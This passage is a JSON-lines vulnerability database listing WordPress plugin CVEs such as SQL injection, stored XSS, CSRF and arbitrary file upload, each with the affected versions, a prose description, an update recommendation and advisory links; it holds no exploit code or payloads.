{"CVE_ID":"CVE-2025-1483","slug":"ltl-freight-quotes-globaltranz-edition","versionImpact":"2.3.12","versionEndExcluding":"2.3.13","description":"The LTL Freight Quotes \u2013 GlobalTranz Edition plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the engtz_wd_save_dropship AJAX endpoint in all versions up to, and including, 2.3.12. This makes it possible for unauthenticated attackers to update the drop shipping settings.","recommendation":"Update to version 2.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243002\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0906e9b0-5093-4ddd-8868-8fcaad8e3a5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0906e9b0-5093-4ddd-8868-8fcaad8e3a5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13476","slug":"ltl-freight-quotes-globaltranz-edition","versionImpact":"2.3.11","versionEndExcluding":"2.3.12","description":"The LTL Freight Quotes \u2013 GlobalTranz Edition plugin for WordPress is vulnerable to SQL Injection via the 'engtz_wd_save_dropship' AJAX endpoint in all versions up to, and including, 2.3.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.3.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242457\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242457\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7c846-c82b-40c8-a5ae-88b30c761ba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7c846-c82b-40c8-a5ae-88b30c761ba9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6319","slug":"imgspider","versionImpact":"2.3.10","versionEndExcluding":"2.3.11","description":"The IMGspider plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 2.3.10. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63a4a077-c99e-4742-9fa1-f323fd24b950?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63a4a077-c99e-4742-9fa1-f323fd24b950?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6318","slug":"imgspider","versionImpact":"2.3.10","versionEndExcluding":"2.3.11","description":"The IMGspider plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload_img_file' function in all versions up to, and including, 2.3.10. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306f00e4-9a70-48be-a91e-e396643a8129?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306f00e4-9a70-48be-a91e-e396643a8129?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36759","slug":"insert-php","versionEndExcluding":"2.3.10","description":"The Woody code snippets plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.9. This is due to missing or incorrect nonce validation on the runActions() function. This makes it possible for unauthenticated attackers to activate and deactivate snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368332%40insert-php&new=2368332%40insert-php&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368332%40insert-php&new=2368332%40insert-php&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e573c0a4-d053-400b-828c-0d0eca880776?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e573c0a4-d053-400b-828c-0d0eca880776?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3452","slug":"secupress","versionImpact":"2.3.9","versionEndExcluding":"2.3.10","description":"The SecuPress Free \u2014 WordPress Security plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'secupress_reinstall_plugins_admin_ajax_cb' function in all versions up to, and including, 2.3.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins.","recommendation":"Update to version 2.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/modules\\\/plugins-themes\\\/tools.php#L686\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/modules\\\/plugins-themes\\\/tools.php#L686\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283453\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283453\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9125873-aedd-4334-b8e0-74b67d301904?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9125873-aedd-4334-b8e0-74b67d301904?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0561","slug":"ultimate-posts-widget","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The Ultimate Posts Widget WordPress plugin before 2.3.1 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99b6aa8b-deb9-48f8-8896-f3c8118a4f70\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99b6aa8b-deb9-48f8-8896-f3c8118a4f70\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4765","slug":"portfolio-elementor","versionEndExcluding":"2.3.1","description":"The Portfolio for Elementor WordPress plugin before 2.3.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a21dc4a3-a4f3-4619-b8a3-493a27e14ccb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a21dc4a3-a4f3-4619-b8a3-493a27e14ccb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4824","slug":"wp-blog-and-widgets","versionEndExcluding":"2.3.1","description":"The WP Blog and Widgets WordPress plugin before 2.3.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9af8e425-c477-4e2b-9445-70ffb769f3f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9af8e425-c477-4e2b-9445-70ffb769f3f0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3648","slug":"sharethis-share-buttons","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The ShareThis Share Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sharethis-inline-button' shortcode in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b37c90-4bb5-4003-a440-3fb57a5c1cae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b37c90-4bb5-4003-a440-3fb57a5c1cae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089529\\\/sharethis-share-buttons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089529\\\/sharethis-share-buttons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8792","slug":"subscribe-to-comments","versionImpact":"2.3","versionEndExcluding":"2.3.1","description":"The Subscribe to Comments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7566ac1-9ae2-44d2-8ad1-029957870992?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7566ac1-9ae2-44d2-8ad1-029957870992?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe-to-comments\\\/trunk\\\/subscribe-to-comments.php#L1470\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe-to-comments\\\/trunk\\\/subscribe-to-comments.php#L1470\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3177660%40subscribe-to-comments%2Ftrunk&old=1198281%40subscribe-to-comments%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3177660%40subscribe-to-comments%2Ftrunk&old=1198281%40subscribe-to-comments%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5533","slug":"knowledgebase","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The Knowledge Base plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kbalert' shortcode in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306850%40knowledgebase&new=3306850%40knowledgebase&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306850%40knowledgebase&new=3306850%40knowledgebase&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400564ba-70f8-4566-b2e7-cfa6450b609e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400564ba-70f8-4566-b2e7-cfa6450b609e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3073","slug":"easy-wp-smtp","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The Easy WP SMTP by SendLayer \u2013 WordPress SMTP and Email Log Plugin plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 2.3.0. This is due to plugin providing the SMTP password in the SMTP Password field when viewing the settings. This makes it possible for authenticated attackers, with administrative-level access and above, to view the SMTP password for the supplied server. Although this would not be useful for attackers in most cases, if an administrator account becomes compromised this could be useful information to an attacker in a limited environment.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b043197c-4477-4663-abb8-5840173c574d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b043197c-4477-4663-abb8-5840173c574d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101553%40easy-wp-smtp&new=3101553%40easy-wp-smtp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101553%40easy-wp-smtp&new=3101553%40easy-wp-smtp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8657","slug":"garden-gnome-package","versionImpact":"2.2.9","versionEndExcluding":"2.3.0","description":"The Garden Gnome Package plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ggpkg shortcode in all versions up to, and including, 2.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a295969-454a-47fb-bc35-4e84db38c887?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a295969-454a-47fb-bc35-4e84db38c887?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.9\\\/include\\\/ggpackage.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.9\\\/include\\\/ggpackage.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3154566%40garden-gnome-package&new=3154566%40garden-gnome-package&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3154566%40garden-gnome-package&new=3154566%40garden-gnome-package&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9503","slug":"maintenance-coming-soon-redirect-animation","versionImpact":"2.1.3","versionEndExcluding":"2.3.0","description":"The Maintenance & Coming Soon Redirect Animation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wploti_add_whitelisted_roles_option',  'wploti_remove_whitelisted_roles_option', 'wploti_add_whitelisted_users_option', 'wploti_remove_whitelisted_users_option', and 'wploti_uploaded_animation_save_option' functions in all versions up to, and including, 2.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify certain plugin settings.","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maintenance-coming-soon-redirect-animation\\\/trunk\\\/wploti_maintenance_redirect.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maintenance-coming-soon-redirect-animation\\\/trunk\\\/wploti_maintenance_redirect.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e716cf9-198c-4a32-883d-3f90dd399aee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e716cf9-198c-4a32-883d-3f90dd399aee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47174","slug":"performance-lab","versionEndExcluding":"2.3.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in WordPress Performance Team Performance Lab plugin <=\u00a02.2.0 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/performance-lab\\\/wordpress-performance-lab-plugin-2-2-0-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/performance-lab\\\/wordpress-performance-lab-plugin-2-2-0-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4805","slug":"tutor","versionImpact":"2.2.4","versionEndExcluding":"2.3.0","description":"The Tutor LMS WordPress plugin before 2.3.0 does not sanitise and escape some of its settings, which could allow users such as subscriber to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1049e940-49b1-4236-bea2-c636f35c5647\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1049e940-49b1-4236-bea2-c636f35c5647\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6383","slug":"debug-log-manager","versionImpact":"2.2.2","versionEndExcluding":"2.3.0","description":"The Debug Log Manager WordPress plugin before 2.3.0 contains a Directory listing vulnerability was discovered, which allows you to download the debug log without authorization and gain access to sensitive data","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eae63103-3de6-4100-8f48-2bcf9a5c91fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eae63103-3de6-4100-8f48-2bcf9a5c91fb\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6335","slug":"tracking-code-manager","versionImpact":"2.2.0","versionEndExcluding":"2.3.0","description":"The Tracking Code Manager WordPress plugin before 2.3.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3bfb6b3f-8642-4807-b6b3-f214b26e96c2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3bfb6b3f-8642-4807-b6b3-f214b26e96c2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10133","slug":"subscribe-to-comments","versionImpact":"2.1.2","versionEndExcluding":"2.3","description":"The Subscribe to Comments for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 2.1.2 via the Path to header value. This allows authenticated attackers, with administrative privileges and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This same function can also be used to execute arbitrary PHP code.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/advisories.dxw.com\\\/advisories\\\/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2\\\/\",\"name\":\"https:\\\/\\\/advisories.dxw.com\\\/advisories\\\/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132694\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132694\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1198281%40subscribe-to-comments&new=1198281%40subscribe-to-comments&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1198281%40subscribe-to-comments&new=1198281%40subscribe-to-comments&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/seclists.org\\\/fulldisclosure\\\/2015\\\/Jul\\\/71\",\"name\":\"https:\\\/\\\/seclists.org\\\/fulldisclosure\\\/2015\\\/Jul\\\/71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f92784a7-f2b3-47f8-b03f-4e234b57e40a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f92784a7-f2b3-47f8-b03f-4e234b57e40a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10019","slug":"front-end-editor","versionEndExcluding":"2.3","description":"The Front End Editor plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the upload.php file in versions before 2.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132303\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132303\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=600233%40front-end-editor&old=569105%40front-end-editor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=600233%40front-end-editor&old=569105%40front-end-editor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20120712205339\\\/https%3A\\\/\\\/www.opensyscom.fr\\\/Actualites\\\/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20120712205339\\\/https%3A\\\/\\\/www.opensyscom.fr\\\/Actualites\\\/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2012070701\",\"name\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2012070701\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f271c2e7-9d58-4dea-95d3-3ffc4ec7c3b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f271c2e7-9d58-4dea-95d3-3ffc4ec7c3b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23734","slug":"userlike","versionEndExcluding":"2.3","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in David Voswinkel Userlike \u2013 WordPress Live Chat plugin <=\u00a02.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/userlike\\\/wordpress-userlike-wordpress-live-chat-plugin-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/userlike\\\/wordpress-userlike-wordpress-live-chat-plugin-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9019","slug":"secupress","versionImpact":"2.2.5.3","versionEndExcluding":"2.3","description":"The SecuPress Free \u2014 WordPress Security plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's secupress_check_ban_ips_form shortcode in all versions up to, and including, 2.2.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3, or a newer patched 